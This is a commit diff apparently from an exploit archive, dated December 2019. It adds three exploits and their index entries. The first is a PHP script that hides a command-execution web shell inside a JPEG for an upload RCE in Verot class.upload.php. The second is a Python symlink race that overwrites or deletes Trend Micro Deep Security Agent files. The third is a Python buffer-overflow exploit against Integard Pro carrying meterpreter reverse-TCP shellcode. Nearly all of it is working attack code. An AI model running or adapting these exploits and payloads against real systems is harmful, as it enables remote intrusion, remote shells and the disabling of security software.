DB: 2019-12-07

3 changes to exploits/shellcodes Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow Verot 2.0.3 - Remote Code Execution
2019-12-07 05:02:08 +00:00 · 2019-12-07 05:02:08 +00:00 · 30a6a01b6c
commit 30a6a01b6c
parent efa6ef060e
4 changed files with 387 additions and 0 deletions
--- a/exploits/php/webapps/47749.php
+++ b/exploits/php/webapps/47749.php
@ -0,0 +1,130 @@
+# Exploit Title: Verot 2.0.3 - Remote Code Execution
+# Date: 2019-12-05
+# Exploit Author: Jinny Ramsmark
+# Vendor Homepage: https://www.verot.net/php_class_upload.htm
+# Software Link: https://github.com/verot/class.upload.php
+# Version: <=2.0.3
+# Tested on: Ubuntu 19.10, PHP 7.3, Apache/2.4.41
+# CVE : CVE-2019-19576
+
+<?php
+#Title: jpeg payload generator for file upload RCE
+#Author: Jinny Ramsmark
+#Github: https://github.com/jra89/CVE-2019-19576
+#Other: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19576
+#Usage: php inject.php
+#Output: image.jpg.phar is the file to be used for upload and exploitation
+
+#This script assumes no special transforming is done on the image for this specific CVE.
+#It can be modified however for different sizes and so on (x,y vars).
+
+ini_set('display_errors', 1);
+error_reporting(E_PARSE);
+#requires php, php-gd
+ 
+$orig = 'image.jpg';
+$code = '<?=exec($_GET["c"])?>';
+$quality = "85";
+$base_url = "http://lorempixel.com";
+ 
+echo "-=Imagejpeg injector 1.7=-\n";
+ 
+do
+{
+    $x = 100;
+    $y = 100;
+    $url = $base_url . "/$x/$y/";
+ 
+    echo "[+] Fetching image ($x X $y) from $url\n";
+    file_put_contents($orig, file_get_contents($url));
+} while(!tryInject($orig, $code, $quality));
+ 
+echo "[+] It seems like it worked!\n";
+echo "[+] Result file: image.jpg.phar\n";
+ 
+function tryInject($orig, $code, $quality)
+{
+    $result_file = 'image.jpg.phar';
+    $tmp_filename = $orig . '_mod2.jpg';
+    
+    //Create base image and load its data
+    $src = imagecreatefromjpeg($orig);
+
+    imagejpeg($src, $tmp_filename, $quality);
+    $data = file_get_contents($tmp_filename);
+    $tmpData = array();
+
+    echo "[+] Jumping to end byte\n";
+    $start_byte = findStart($data);
+ 
+    echo "[+] Searching for valid injection point\n";
+    for($i = strlen($data)-1; $i > $start_byte; --$i)
+    {
+        $tmpData = $data;
+        for($n = $i, $z = (strlen($code)-1); $z >= 0; --$z, --$n)
+        {
+            $tmpData[$n] = $code[$z];
+        }
+ 
+        $src = imagecreatefromstring($tmpData);
+        imagejpeg($src, $result_file, $quality);
+ 
+        if(checkCodeInFile($result_file, $code))
+        {
+            unlink($tmp_filename);
+            unlink($result_file);
+            sleep(1);
+ 
+            file_put_contents($result_file, $tmpData);
+            echo "[!] Temp solution, if you get a 'recoverable parse error' here, it means it probably failed\n";
+ 
+            sleep(1);
+            $src = imagecreatefromjpeg($result_file);
+ 
+            return true;
+        }
+        else
+        {
+            unlink($result_file);
+        }
+    }
+        unlink($orig);
+        unlink($tmp_filename);
+        return false;
+}
+ 
+function findStart($str)
+{
+    for($i = 0; $i < strlen($str); ++$i)
+    {
+        if(ord($str[$i]) == 0xFF && ord($str[$i+1]) == 0xDA)
+        {
+            return $i+2;
+        }
+    }
+ 
+    return -1;
+}
+ 
+function checkCodeInFile($file, $code)
+{
+    if(file_exists($file))
+    {
+        $contents = loadFile($file);
+    }
+    else
+    {
+        $contents = "0";
+    }
+ 
+    return strstr($contents, $code);
+}
+ 
+function loadFile($file)
+{
+    $handle = fopen($file, "r");
+    $buffer = fread($handle, filesize($file));
+    fclose($handle);
+ 
+    return $buffer;
+}
--- a/exploits/windows/local/47751.py
+++ b/exploits/windows/local/47751.py
@ -0,0 +1,106 @@
+# Exploit Title: Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite
+# Exploit Author : Peter Lapp
+# Exploit Date: 2019-12-05
+# Vendor Homepage :  https://www.trendmicro.com/en_us/business.html
+# Link Software : https://help.deepsecurity.trendmicro.com/software.html?regs=NABU&prodid=1716
+# Tested on OS: v11.0.582 and v10.0.3186 on Windows Server 2012 R2, 2008R2, and 7 Enterprise.
+# CVE: 2019-15627
+
+# CVE-2019-15627 - Trend Micro Deep Security Agent Local File Overwrite Exploit by Peter Lapp (lappsec)
+
+# This script uses the symboliclink-testing-tools project, written by James Forshaw ( https://github.com/googleprojectzero/symboliclink-testing-tools )
+# The vulnerability allows an unprivileged local attacker to delete any file on the filesystem, or overwrite it with abritrary data hosted elsewhere (with limitations)
+# This particular script will attempt to overwrite the file dsa_control.cmd with arbitrary data hosted on an external web server, partly disabling TMDS, 
+# even when agent self-protection is turned on. It can also be modified/simplified to simply delete the target file, if desired. 
+
+# When TMDS examines javascript it writes snippets of it to a temporary file, which is locked and then deleted almost immediately.
+# The names of the temp files are sometimes reused, which allows us to predict the filename and redirect to another file.
+# While examining the JS, it generally strips off the first 4096 bytes or so, replaces those with spaces, converts the rest to lowercase and writes it to the temp file. 
+# So the attacker can host a "malicious" page that starts with the normal html and script tags, then fill the rest of the ~4096 bytes with garbage, 
+# then the payload to be written, then a few hundred trailing spaces (not sure why, but they are needed). The resulting temp file will start with 4096 spaces, 
+# and then the lowercase payload. Obviously this has some limitations, like not being able to write binaries, but there are plenty of config files that 
+# are ripe for the writing that can then point to a malicious binary.
+
+# Usage:
+# 1. First you'd need to host your malicious file somewhere. If you just want to delete the target file or overwrite it with garbage, skip this part. 
+# 2. Open a browser (preferrably IE) and start the script
+# 3. Browse to your malicious page (if just deleting the target file, browse to any page with javascript).
+# 4. Keep refreshing the page until you see the script create the target file overwritten.
+#
+# It's a pretty dumb/simple script and won't work every time, so if it doesn't work just run it again. Or write a more reliable exploit. 
+
+
+import time
+import os
+import subprocess
+import sys
+import webbrowser
+from watchdog.observers import Observer
+from watchdog.events import FileSystemEventHandler
+
+class Stage1_Handler(FileSystemEventHandler):
+	def __init__(self):
+		self.filenames = []
+	def on_created(self, event):
+		filename = os.path.basename(event.src_path)
+		if filename in self.filenames:
+			print ('Starting symlink creation.')
+			watcher1.stop()
+			symlinkery(self.filenames)
+		else:
+			self.filenames.append(filename)
+			print ('File %s created.') % filename
+			
+class Stage2_Handler(FileSystemEventHandler):
+	def on_any_event(self, event):
+		if os.path.basename(event.src_path) == 'dsa_control.cmd':
+			print "Target file overwritten/deleted. Cleaning up."
+			subprocess.Popen("taskkill /F /T /IM CreateSymlink.exe", shell=True)
+			subprocess.Popen("taskkill /F /T /IM Baitandswitch.exe", shell=True)
+			os.system('rmdir /S /Q "C:\\ProgramData\\Trend Micro\\AMSP\\temp\\"')
+			os.system('rmdir /S /Q "C:\\test"')
+			os.rename('C:\\ProgramData\\Trend Micro\\AMSP\\temp-orig','C:\\ProgramData\\Trend Micro\\AMSP\\temp')
+			watcher2.stop()
+			sys.exit(0)
+			
+class Watcher(object):
+	def __init__(self, event_handler, path_to_watch):
+		self.event_handler = event_handler
+		self.path_to_watch = path_to_watch
+		self.observer = Observer()
+	def run(self):
+		self.observer.schedule(self.event_handler(), self.path_to_watch)
+		self.observer.start()
+		try:
+			while True:
+				time.sleep(1)
+		except KeyboardInterrupt:
+			self.observer.stop()
+
+		self.observer.join()
+	def stop(self):
+		self.observer.stop()
+		
+def symlinkery(filenames):
+	print "Enter symlinkery"
+	for filename in filenames:
+		print "Creating symlink for %s" % filename
+		cmdname = "start cmd /c CreateSymlink.exe \"C:\\test\\virus\\%s\" \"C:\\test\\test\\symtarget\"" % filename
+		subprocess.Popen(cmdname, shell=True)
+	os.rename('C:\\ProgramData\\Trend Micro\\AMSP\\temp','C:\\ProgramData\\Trend Micro\\AMSP\\temp-orig')
+	os.system('mklink /J "C:\\ProgramData\\Trend Micro\\AMSP\\temp" C:\\test')
+	watcher2.run()
+	print "Watcher 2 started"
+
+try:
+        os.mkdir('C:\\test')
+except:
+        pass
+
+path1 = 'C:\\ProgramData\\Trend Micro\\AMSP\\temp\\virus'
+path2 = 'C:\\Program Files\\Trend Micro\\Deep Security Agent\\'
+watcher1 = Watcher(Stage1_Handler,path1)
+watcher2 = Watcher(Stage2_Handler,path2)
+switcheroo = "start cmd /c BaitAndSwitch.exe C:\\test\\test\\symtarget \"C:\\Program Files\\Trend Micro\\Deep Security Agent\\dsa_control.cmd\" \"C:\\windows\\temp\\deleteme.txt\" d"
+subprocess.Popen(switcheroo, shell=True)
+watcher1.run()
--- a/exploits/windows/remote/47750.py
+++ b/exploits/windows/remote/47750.py
@ -0,0 +1,148 @@
+Exploit Title: Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow
+Date: 2019-09-22
+Exploit Author: purpl3f0xsecur1ty
+Vendor Homepage: https://www.tucows.com/
+Software Link: http://www.tucows.com/preview/519612/Integard-Home
+Version: Pro 2.2.0.9026 / Home 2.0.0.9021
+Tested on: Windows XP / Win7 / Win10
+CVE: CVE-2019-16702
+
+#!/usr/bin/python
+########################################################
+#~Integard Pro 2.2.0.9026 "NoJs" EIP overwrite exploit~#
+#~~~~~~~~~~~~~~~~Authored by purpl3f0x~~~~~~~~~~~~~~~~~#
+# The vulnerability: Integard fails to sanitize input  #
+# to the "NoJs" parameter in an HTTP POST request,     #
+# resulting in a stack buffer overflow that overwrites #
+# the instruction pointer, leading to remote code      #
+# execution.                                           #
+########################################################
+
+import socket
+import os
+import sys
+from struct import pack
+
+def main():
+    print "~*Integard RCE Exploit for XP/7/10*~"
+    print "Chose target: (Enter number only)"
+    print "1)  -  Windows XP"
+    print "2)  -  Windows 7/10"
+    target = str(input())
+    host = "10.0.0.130"
+    port = 18881
+
+    ####################################################
+    # Integard's functionality interferes with reverse #
+    # and bind shells. Only Meterpreter seems to work. #
+    ####################################################
+
+    # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=9001
+    # -b "\x00\x26\x2f\x3d\x3f\x5c" -f python -v meterpreter EXITFUNC=thread
+    meterpreter =  "\x90" * 50
+    meterpreter += "\xda\xcd\xbe\xa2\x51\xce\x97\xd9\x74\x24\xf4"
+    meterpreter += "\x5f\x2b\xc9\xb1\x5b\x83\xef\xfc\x31\x77\x15"
+    meterpreter += "\x03\x77\x15\x40\xa4\x32\x7f\x06\x47\xcb\x80"
+    meterpreter += "\x66\xc1\x2e\xb1\xa6\xb5\x3b\xe2\x16\xbd\x6e"
+    meterpreter += "\x0f\xdd\x93\x9a\x84\x93\x3b\xac\x2d\x19\x1a"
+    meterpreter += "\x83\xae\x31\x5e\x82\x2c\x4b\xb3\x64\x0c\x84"
+    meterpreter += "\xc6\x65\x49\xf8\x2b\x37\x02\x77\x99\xa8\x27"
+    meterpreter += "\xcd\x22\x42\x7b\xc0\x22\xb7\xcc\xe3\x03\x66"
+    meterpreter += "\x46\xba\x83\x88\x8b\xb7\x8d\x92\xc8\xfd\x44"
+    meterpreter += "\x28\x3a\x8a\x56\xf8\x72\x73\xf4\xc5\xba\x86"
+    meterpreter += "\x04\x01\x7c\x78\x73\x7b\x7e\x05\x84\xb8\xfc"
+    meterpreter += "\xd1\x01\x5b\xa6\x92\xb2\x87\x56\x77\x24\x43"
+    meterpreter += "\x54\x3c\x22\x0b\x79\xc3\xe7\x27\x85\x48\x06"
+    meterpreter += "\xe8\x0f\x0a\x2d\x2c\x4b\xc9\x4c\x75\x31\xbc"
+    meterpreter += "\x71\x65\x9a\x61\xd4\xed\x37\x76\x65\xac\x5f"
+    meterpreter += "\xbb\x44\x4f\xa0\xd3\xdf\x3c\x92\x7c\x74\xab"
+    meterpreter += "\x9e\xf5\x52\x2c\x96\x11\x65\xe2\x10\x71\x9b"
+    meterpreter += "\x03\x61\x58\x58\x57\x31\xf2\x49\xd8\xda\x02"
+    meterpreter += "\x75\x0d\x76\x08\xe1\xa4\x87\x0c\x71\xd0\x85"
+    meterpreter += "\x0c\x52\x08\x03\xea\xc4\x1a\x43\xa2\xa4\xca"
+    meterpreter += "\x23\x12\x4d\x01\xac\x4d\x6d\x2a\x66\xe6\x04"
+    meterpreter += "\xc5\xdf\x5f\xb1\x7c\x7a\x2b\x20\x80\x50\x56"
+    meterpreter += "\x62\x0a\x51\xa7\x2d\xfb\x10\xbb\x5a\x9c\xda"
+    meterpreter += "\x43\x9b\x09\xdb\x29\x9f\x9b\x8c\xc5\x9d\xfa"
+    meterpreter += "\xfb\x4a\x5d\x29\x78\x8c\xa1\xac\x49\xe7\x94"
+    meterpreter += "\x3a\xf6\x9f\xd8\xaa\xf6\x5f\x8f\xa0\xf6\x37"
+    meterpreter += "\x77\x91\xa4\x22\x78\x0c\xd9\xff\xed\xaf\x88"
+    meterpreter += "\xac\xa6\xc7\x36\x8b\x81\x47\xc8\xfe\x91\x80"
+    meterpreter += "\x36\x7d\xbe\x28\x5f\x7d\xfe\xc8\x9f\x17\xfe"
+    meterpreter += "\x98\xf7\xec\xd1\x17\x38\x0d\xf8\x7f\x50\x84"
+    meterpreter += "\x6d\xcd\xc1\x99\xa7\x93\x5f\x9a\x44\x08\x6f"
+    meterpreter += "\xe1\x25\xaf\x90\x16\x2c\xd4\x90\x17\x50\xea"
+    meterpreter += "\xad\xce\x69\x98\xf0\xd3\xcd\x83\xee\xf9\x3b"
+    meterpreter += "\x2c\xb7\x68\x86\x31\x48\x47\xc5\x4f\xcb\x6d"
+    meterpreter += "\xb6\xab\xd3\x04\xb3\xf0\x53\xf5\xc9\x69\x36"
+    meterpreter += "\xf9\x7e\x89\x13"
+
+    if target == "1":
+        print "[*] Sending Windows XP payload using meterpreter/reverse_tcp"
+        # JMP ESP at 0x3E087557 in iertutil.dll
+        crash = "A" * 512
+        crash += pack("<L",0x3E087557)
+        crash += meterpreter
+        crash += "C" * (1500 - len(crash))
+
+        buffer = ""
+        buffer += "POST /LoginAdmin HTTP/1.1\r\n"
+        buffer += "Host: 10.0.0.130:18881\r\n"
+        buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
+        buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+        buffer += "Accept-Language: en-US,en;q=0.5\r\n"
+        buffer += "Accept-Encoding: gzip, deflate\r\n"
+        buffer += "Referer: http://10.0.0.130:18881/\r\n"
+        buffer += "Connection: close\r\n"
+        buffer += "Upgrade-Insecure-Requests: 1\r\n"
+        buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
+        buffer += "Content-Length: 78\r\n\r\n"
+        buffer += "Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + "&LoginButtonName=Login\r\n"
+
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.connect((host,port))
+        s.send(buffer)
+        s.close()
+        print "[*] Done"
+
+    if target == "2":
+        print "[*] Sending Windows 7/10 payload using meterpreter/reverse_tcp"
+        
+        # ASLR IS ON!!! MUST USE NON-ASLR MODULE!
+        # POP POP RET in integard.exe (ASLR disabled)
+        nSEH = "\xEB\xD0\x90\x90"   # Jump 48 bytes backwards
+        SEH = pack("<L",0x004042B0)
+
+        jumpCall = "\xEB\x09" # Jump 11 bytes forward to hit the CALL in bigBackJump
+        bigBackJump = "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF"
+        
+        crash = "\x90" * (2776 -len(jumpCall) - len(bigBackJump) - len(meterpreter) - 50)
+        crash += meterpreter
+        crash += "\x90" * 50
+        crash += jumpCall
+        crash += bigBackJump
+        crash += nSEH
+        crash += SEH
+
+
+        buffer = ""
+        buffer += "POST /LoginAdmin HTTP/1.1\r\n"
+        buffer += "Host: 10.0.0.130:18881\r\n"
+        buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
+        buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+        buffer += "Accept-Language: en-US,en;q=0.5\r\n"
+        buffer += "Accept-Encoding: gzip, deflate\r\n"
+        buffer += "Referer: http://10.0.0.130:18881/\r\n"
+        buffer += "Connection: close\r\n"
+        buffer += "Upgrade-Insecure-Requests: 1\r\n"
+        buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
+        buffer += "Content-Length: 78\r\n\r\n"
+        buffer += "Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + "&LoginButtonName=Login\r\n"
+
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.connect((host,port))
+        s.send(buffer)
+        s.close()
+        print "[*] Done"
+
+main()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10827,6 +10827,7 @@ id,file,description,date,author,type,platform,port
 47743,exploits/xml/local/47743.txt,"Microsoft Visual Basic 2010 Express - XML External Entity Injection",2019-12-04,ZwX,local,xml,
 47746,exploits/windows/local/47746.txt,"NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path",2019-12-05,ZwX,local,windows,
 47747,exploits/windows/local/47747.txt,"Amiti Antivirus 25.0.640 - Unquoted Service Path",2019-12-05,ZwX,local,windows,
+47751,exploits/windows/local/47751.py,"Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite",2019-12-06,"Peter Lapp",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17846,6 +17847,7 @@ id,file,description,date,author,type,platform,port
 47698,exploits/multiple/remote/47698.rb,"FreeSWITCH - Event Socket Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,
 47699,exploits/php/remote/47699.rb,"Bludit - Directory Traversal Image File Upload (Metasploit)",2019-11-20,Metasploit,remote,php,
 47700,exploits/multiple/remote/47700.rb,"Pulse Secure VPN - Arbitrary Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,
+47750,exploits/windows/remote/47750.py,"Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow",2019-12-06,purpl3f0xsecur1ty,remote,windows,18881
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -42055,6 +42057,7 @@ id,file,description,date,author,type,platform,port
 47738,exploits/hardware/webapps/47738.txt,"Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery",2019-12-03,"Prof. Joas Antonio",webapps,hardware,80
 47739,exploits/php/webapps/47739.php,"Revive Adserver 4.2 - Remote Code Execution",2019-12-03,crlf,webapps,php,
 47741,exploits/php/webapps/47741.txt,"Online Clinic Management System 2.2 - HTML Injection",2019-12-04,"Cemal Cihad ÇİFTÇİ",webapps,php,
+47749,exploits/php/webapps/47749.php,"Verot 2.0.3 - Remote Code Execution",2019-12-06,"Jinny Ramsmark",webapps,php,
 47744,exploits/hardware/webapps/47744.txt,"Cisco WLC 2504 8.9 - Denial of Service (PoC)",2019-12-04,SecuNinja,webapps,hardware,
 47745,exploits/php/webapps/47745.txt,"OwnCloud 8.1.8 - Username Disclosure",2019-12-04,"Daniel Moreno",webapps,php,
 47748,exploits/windows/webapps/47748.py,"Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution",2019-12-05,"Peter Lapp",webapps,windows,